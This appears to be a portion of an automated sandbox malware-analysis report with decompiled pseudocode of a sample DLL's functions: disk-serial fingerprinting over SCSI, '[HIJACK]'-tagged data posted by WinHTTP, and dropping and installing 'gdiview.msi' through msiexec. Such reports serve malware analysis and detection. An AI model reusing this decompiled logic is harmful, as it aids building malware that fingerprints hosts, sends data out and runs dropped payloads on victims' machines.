                                                                                                                                                      			E100211B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				void* _t86;
				void* _t88;
				intOrPtr _t91;
				void* _t92;
				void* _t120;
				void* _t140;
				void* _t141;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_t192 = __esi;
				_t191 = __edi;
				_t141 = __ebx;
				_v32 = 0;
				_v20 = "https://";
				_v16 = "http://";
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_t86 = E10001A50(_a4, _v20);
				_t194 = _t193 + 8;
				if(_t86 != 0) {
					L2:
					_v8 = _a4;
					_t88 = E10001A50(_a4, _v20);
					_t195 = _t194 + 8;
					if(_t88 == 0) {
						 *_a8 = 0;
						_v8 = _v8 + 7;
						 *_a20 = 0x50;
					} else {
						 *_a8 = 1;
						_v8 = _v8 + 8;
						 *_a20 = 0x1bb;
					}
					_t91 = E10001A50(_v8, "/");
					_t196 = _t195 + 8;
					_v28 = _t91;
					if(_v28 == 0) {
						_t92 = E1000CAC0(_v8);
						_t196 = _t196 + 4;
						_v24 = _t92 + 1;
					} else {
						_v24 = _v28 - _v8 + 1;
					}
					 *_a12 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
					E1000CF20(_t191,  *_a12, 0, _v24);
					E1000D190(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
					_v28 = E10001A50(_v8, "/");
					if(_v28 == 0) {
						_v24 = 2;
						 *_a24 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
						E1000CF20(_t191,  *_a24, 0, _v24);
						E1000E280( *_a24, "/");
					} else {
						_v24 = E1000CAC0(_v8) - _v28 - _v8 + 1;
						 *_a24 = L1000CE56(_t141, _v28 - _v8, _t191, _t192, _v24);
						E1000CF20(_t191,  *_a24, 0, _v24);
						E1000E280( *_a24, _v28);
					}
					_v8 = E10001A50( *_a12, ":");
					if(_v8 == 0) {
						_t181 = _a12;
						_v24 = E1000CAC0( *_a12) + 1;
					} else {
						_v24 = _v8 -  *_a12 + 1;
						_t120 = E1000CAC0( *_a12);
						_t181 =  &_v44;
						E1000D190(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
						E1000E5E5( &_v44, "%d", _a20);
					}
					 *_a16 = L1000CE56(_t141, _t181, _t191, _t192, _v24);
					E1000CF20(_t191,  *_a16, 0, _v24);
					E1000D190(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
					_v32 = 1;
				} else {
					_t140 = E10001A50(_a4, _v16);
					_t194 = _t194 + 8;
					if(_t140 != 0) {
						goto L2;
					}
				}
				return _v32;
			}



























                                                                                                                                                      0x100211b0
                                                                                                                                                      0x100211b0
                                                                                                                                                      0x100211b0
                                                                                                                                                      0x100211b6
                                                                                                                                                      0x100211bd
                                                                                                                                                      0x100211c4
                                                                                                                                                      0x100211cb
                                                                                                                                                      0x100211d2
                                                                                                                                                      0x100211d9
                                                                                                                                                      0x100211e0
                                                                                                                                                      0x100211e7
                                                                                                                                                      0x100211ed
                                                                                                                                                      0x100211f0
                                                                                                                                                      0x100211f3
                                                                                                                                                      0x100211fe
                                                                                                                                                      0x10021203
                                                                                                                                                      0x10021208
                                                                                                                                                      0x10021222
                                                                                                                                                      0x10021225
                                                                                                                                                      0x10021230
                                                                                                                                                      0x10021235
                                                                                                                                                      0x1002123a
                                                                                                                                                      0x1002125c
                                                                                                                                                      0x10021268
                                                                                                                                                      0x1002126e
                                                                                                                                                      0x1002123c
                                                                                                                                                      0x1002123f
                                                                                                                                                      0x1002124b
                                                                                                                                                      0x10021251
                                                                                                                                                      0x10021251
                                                                                                                                                      0x1002127d
                                                                                                                                                      0x10021282
                                                                                                                                                      0x10021285
                                                                                                                                                      0x1002128c
                                                                                                                                                      0x100212a0
                                                                                                                                                      0x100212a5
                                                                                                                                                      0x100212ab
                                                                                                                                                      0x1002128e
                                                                                                                                                      0x10021297
                                                                                                                                                      0x10021297
                                                                                                                                                      0x100212bd
                                                                                                                                                      0x100212cb
                                                                                                                                                      0x100212e4
                                                                                                                                                      0x100212fd
                                                                                                                                                      0x10021304
                                                                                                                                                      0x10021359
                                                                                                                                                      0x1002136f
                                                                                                                                                      0x1002137d
                                                                                                                                                      0x10021390
                                                                                                                                                      0x10021306
                                                                                                                                                      0x1002131d
                                                                                                                                                      0x1002132f
                                                                                                                                                      0x1002133d
                                                                                                                                                      0x1002134f
                                                                                                                                                      0x10021354
                                                                                                                                                      0x100213ab
                                                                                                                                                      0x100213b2
                                                                                                                                                      0x100213fe
                                                                                                                                                      0x1002140f
                                                                                                                                                      0x100213b4
                                                                                                                                                      0x100213bf
                                                                                                                                                      0x100213c8
                                                                                                                                                      0x100213db
                                                                                                                                                      0x100213df
                                                                                                                                                      0x100213f4
                                                                                                                                                      0x100213f9
                                                                                                                                                      0x10021421
                                                                                                                                                      0x1002142f
                                                                                                                                                      0x1002144a
                                                                                                                                                      0x10021452
                                                                                                                                                      0x1002120a
                                                                                                                                                      0x10021212
                                                                                                                                                      0x10021217
                                                                                                                                                      0x1002121c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1002121c
                                                                                                                                                      0x1002145f

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3056589307-0
                                                                                                                                                      • Opcode ID: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                      • Instruction ID: b73e38e492334931c567e70ec6057ca77ce0bc3bbcd211be2433ac406d63848b
                                                                                                                                                      • Opcode Fuzzy Hash: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                      • Instruction Fuzzy Hash: E3911BB9E00209EFDB00CFA4D991EAFB7B5FF48344F104568F905AB345E635AA14CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001D560, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E1001D560(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF20(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CD70( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							CloseHandle(_v32);
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}
































                                                                                                                                                      0x1001d560
                                                                                                                                                      0x1001d569
                                                                                                                                                      0x1001d570
                                                                                                                                                      0x1001d57a
                                                                                                                                                      0x1001d581
                                                                                                                                                      0x1001d591
                                                                                                                                                      0x1001d597
                                                                                                                                                      0x1001d5b6
                                                                                                                                                      0x1001d5bd
                                                                                                                                                      0x1001d5c3
                                                                                                                                                      0x1001d5ca
                                                                                                                                                      0x1001d5e5
                                                                                                                                                      0x1001d5ea
                                                                                                                                                      0x1001d5ed
                                                                                                                                                      0x1001d5f7
                                                                                                                                                      0x1001d604
                                                                                                                                                      0x1001d60a
                                                                                                                                                      0x1001d614
                                                                                                                                                      0x1001d61e
                                                                                                                                                      0x1001d628
                                                                                                                                                      0x1001d632
                                                                                                                                                      0x1001d668
                                                                                                                                                      0x1001d76e
                                                                                                                                                      0x1001d775
                                                                                                                                                      0x1001d78d
                                                                                                                                                      0x1001d777
                                                                                                                                                      0x1001d780
                                                                                                                                                      0x1001d786
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d788
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d788
                                                                                                                                                      0x1001d786
                                                                                                                                                      0x1001d67d
                                                                                                                                                      0x1001d67d
                                                                                                                                                      0x1001d684
                                                                                                                                                      0x1001d692
                                                                                                                                                      0x1001d69f
                                                                                                                                                      0x1001d6a2
                                                                                                                                                      0x1001d6b2
                                                                                                                                                      0x1001d6b7
                                                                                                                                                      0x1001d6ba
                                                                                                                                                      0x1001d6bd
                                                                                                                                                      0x1001d6c7
                                                                                                                                                      0x1001d6d1
                                                                                                                                                      0x1001d6dd
                                                                                                                                                      0x1001d6e3
                                                                                                                                                      0x1001d6fa
                                                                                                                                                      0x1001d709
                                                                                                                                                      0x1001d719
                                                                                                                                                      0x1001d724
                                                                                                                                                      0x1001d72d
                                                                                                                                                      0x1001d730
                                                                                                                                                      0x1001d733
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d735
                                                                                                                                                      0x1001d741
                                                                                                                                                      0x1001d74a
                                                                                                                                                      0x1001d750
                                                                                                                                                      0x1001d750
                                                                                                                                                      0x1001d70b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d70b
                                                                                                                                                      0x1001d75a
                                                                                                                                                      0x1001d760
                                                                                                                                                      0x1001d76a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d76c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d76c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d76a
                                                                                                                                                      0x1001d73d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d73f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d73d
                                                                                                                                                      0x1001d79e
                                                                                                                                                      0x1001d7a2
                                                                                                                                                      0x1001d7ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d7ab
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x1001d7ae
                                                                                                                                                      0x1001d7b4
                                                                                                                                                      0x1001d7ba
                                                                                                                                                      0x1001d7bd
                                                                                                                                                      0x1001d7d0

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                      • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001D660
                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1001D7A2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
                                                                                                                                                      • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                      • API String ID: 3873020565-153650326
                                                                                                                                                      • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                      • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
                                                                                                                                                      • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                      • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10022760, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 138COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                      			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v72;
				char _v100;
				char _v128;
				intOrPtr _v132;
				char _v160;
				char _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				void* __ebp;
				void* _t75;
				void* _t76;
				intOrPtr _t119;
				void* _t127;

				_t127 = __eflags;
				_t118 = __esi;
				_t117 = __edi;
				_t87 = __ebx;
				_push(0xffffffff);
				_push(E10022C17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t119;
				_v192 = 0;
				_push(_a12);
				_push(0x30);
				_push("post_info");
				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
				_v8 = 0;
				_v196 = E10001160( &_v160, _t127, _a8);
				_v200 = _v196;
				_v8 = 1;
				E10001A70( &_v128, _v200);
				_v8 = 0;
				E100011A0( &_v160);
				E10001160( &_v100, _t127, "info=");
				_v8 = 2;
				_v204 = E10001160( &_v188, _t127, _v132);
				_v208 = _v204;
				_v8 = 3;
				E10001A70( &_v100, _v208);
				_v8 = 2;
				E100011A0( &_v188);
				_push(E100011E0( &_v128));
				_push(0x3d);
				_push("post_info");
				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
				E10001160( &_v44, _t127, 0x10024ca2);
				_v8 = 4;
				E10001160( &_v72, _t127, 0x10024ca3);
				_v8 = 5;
				_t75 = E10001200( &_v100);
				_t76 = E100011E0( &_v100);
				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72);
				_push(_v132);
				E1000CA30(_t87, _t117, _t118, _t127);
				E10001110(_a4, _t127,  &_v72);
				_v192 = _v192 | 0x00000001;
				_v8 = 4;
				E100011A0( &_v72);
				_v8 = 2;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v100);
				_v8 = 0xffffffff;
				E100011A0( &_v128);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                      0x10022760
                                                                                                                                                      0x10022760
                                                                                                                                                      0x10022760
                                                                                                                                                      0x10022760
                                                                                                                                                      0x10022763
                                                                                                                                                      0x10022765
                                                                                                                                                      0x10022770
                                                                                                                                                      0x10022771
                                                                                                                                                      0x1002277e
                                                                                                                                                      0x1002278b
                                                                                                                                                      0x1002278c
                                                                                                                                                      0x1002278e
                                                                                                                                                      0x100227a4
                                                                                                                                                      0x100227b8
                                                                                                                                                      0x100227bf
                                                                                                                                                      0x100227c7
                                                                                                                                                      0x100227dd
                                                                                                                                                      0x100227e9
                                                                                                                                                      0x100227ef
                                                                                                                                                      0x100227fd
                                                                                                                                                      0x10022802
                                                                                                                                                      0x1002280c
                                                                                                                                                      0x10022819
                                                                                                                                                      0x1002281e
                                                                                                                                                      0x10022831
                                                                                                                                                      0x1002283d
                                                                                                                                                      0x10022843
                                                                                                                                                      0x10022851
                                                                                                                                                      0x10022856
                                                                                                                                                      0x10022860
                                                                                                                                                      0x1002286d
                                                                                                                                                      0x1002286e
                                                                                                                                                      0x10022870
                                                                                                                                                      0x10022886
                                                                                                                                                      0x10022896
                                                                                                                                                      0x1002289b
                                                                                                                                                      0x100228a7
                                                                                                                                                      0x100228ac
                                                                                                                                                      0x100228c7
                                                                                                                                                      0x100228d0
                                                                                                                                                      0x100228eb
                                                                                                                                                      0x100228f6
                                                                                                                                                      0x100228f7
                                                                                                                                                      0x10022906
                                                                                                                                                      0x10022914
                                                                                                                                                      0x1002291a
                                                                                                                                                      0x10022921
                                                                                                                                                      0x10022926
                                                                                                                                                      0x1002292d
                                                                                                                                                      0x10022932
                                                                                                                                                      0x10022939
                                                                                                                                                      0x1002293e
                                                                                                                                                      0x10022948
                                                                                                                                                      0x10022953
                                                                                                                                                      0x1002295d

                                                                                                                                                      APIs
                                                                                                                                                      • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000030,?), ref: 10022798
                                                                                                                                                        • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                        • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                        • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
                                                                                                                                                        • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
                                                                                                                                                        • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
                                                                                                                                                        • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
                                                                                                                                                        • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
                                                                                                                                                        • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                        • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
                                                                                                                                                      • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
                                                                                                                                                        • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                        • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
                                                                                                                                                      • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                      • API String ID: 728604215-152146038
                                                                                                                                                      • Opcode ID: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                      • Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
                                                                                                                                                      • Opcode Fuzzy Hash: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                      • Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A480, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E1001A480(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				signed int _v8;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebp;
				void* _t36;
				void* _t75;
				void* _t80;
				void* _t81;

				_t74 = __esi;
				_t73 = __edi;
				_t57 = __ebx;
				_v8 = 0;
				_v176 = L1000CE56(__ebx, __edx, __edi, __esi, 0x10);
				_v168 = L1000CE56(__ebx, __edx, __edi, __esi, 0x21);
				E1000CF20(__edi, _v168, 0, 0x21);
				E1000CF20(_t73, _v176, 0, 0x10);
				_t67 = _a4;
				_t36 = E1000CAC0(_a4);
				_t80 = _t75 + 0x24;
				if(_t36 <= 0) {
					E1000E280(_v168, "00000000000000000000000000000000");
					_t81 = _t80 + 8;
				} else {
					E1001BC10( &_v164);
					E1001CAC0( &_v164, _a4, E1000CAC0(_a4));
					_t67 =  &_v164;
					E1001CBC0( &_v164, _v176);
					_t81 = _t80 + 0x1c;
					_v8 = 0;
					while(_v8 < 0x10) {
						_t67 = _v168 + _v8 * 2;
						E1000CC93(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
						_t81 = _t81 + 0xc;
						_v8 = _v8 + 1;
					}
				}
				_push(_v176);
				E1000CA30(_t57, _t73, _t74, __eflags);
				_v172 = L1000CE56(_t57, _t67, _t73, _t74, 0x11);
				E1000CF20(_t73, _v172, 0, 0x11);
				__eflags = _v168 + 8;
				E1000D190(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
				_push(_v168);
				E1000CA30(_t57, _t73, _t74, __eflags);
				return _v172;
			}













                                                                                                                                                      0x1001a480
                                                                                                                                                      0x1001a480
                                                                                                                                                      0x1001a480
                                                                                                                                                      0x1001a489
                                                                                                                                                      0x1001a49a
                                                                                                                                                      0x1001a4aa
                                                                                                                                                      0x1001a4bb
                                                                                                                                                      0x1001a4ce
                                                                                                                                                      0x1001a4d6
                                                                                                                                                      0x1001a4da
                                                                                                                                                      0x1001a4df
                                                                                                                                                      0x1001a4e4
                                                                                                                                                      0x1001a584
                                                                                                                                                      0x1001a589
                                                                                                                                                      0x1001a4ea
                                                                                                                                                      0x1001a4f1
                                                                                                                                                      0x1001a511
                                                                                                                                                      0x1001a520
                                                                                                                                                      0x1001a527
                                                                                                                                                      0x1001a52c
                                                                                                                                                      0x1001a52f
                                                                                                                                                      0x1001a541
                                                                                                                                                      0x1001a568
                                                                                                                                                      0x1001a56c
                                                                                                                                                      0x1001a571
                                                                                                                                                      0x1001a53e
                                                                                                                                                      0x1001a53e
                                                                                                                                                      0x1001a576
                                                                                                                                                      0x1001a592
                                                                                                                                                      0x1001a593
                                                                                                                                                      0x1001a5a5
                                                                                                                                                      0x1001a5b6
                                                                                                                                                      0x1001a5c6
                                                                                                                                                      0x1001a5d1
                                                                                                                                                      0x1001a5df
                                                                                                                                                      0x1001a5e0
                                                                                                                                                      0x1001a5f1

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                      • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                      • API String ID: 796335831-606320477
                                                                                                                                                      • Opcode ID: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
                                                                                                                                                      • Instruction ID: 5f34500701607727b308b008c02476916cf30523b6eb1de7e1c0da2fd1923ee1
                                                                                                                                                      • Opcode Fuzzy Hash: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
                                                                                                                                                      • Instruction Fuzzy Hash: 6D3162BAE0030CABEB10DB60DC42FAE7375DF46344F0444A4F9496B246E671EB949B93
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FC70, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001FC70(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF20(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC10( &_v1292, 0x10026888, 0x39e00);
				_t21 = PathFileExistsA( &_v1292);
				_t38 = _t21;
				if(_t21 != 0) {
					return E1001A1D0(_t38,  &_v1028);
				}
				return _t21;
			}








                                                                                                                                                      0x1001fc70
                                                                                                                                                      0x1001fc79
                                                                                                                                                      0x1001fc8e
                                                                                                                                                      0x1001fc96
                                                                                                                                                      0x1001fcab
                                                                                                                                                      0x1001fcbf
                                                                                                                                                      0x1001fcd6
                                                                                                                                                      0x1001fcf1
                                                                                                                                                      0x1001fd0a
                                                                                                                                                      0x1001fd19
                                                                                                                                                      0x1001fd1f
                                                                                                                                                      0x1001fd21
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001fd2f
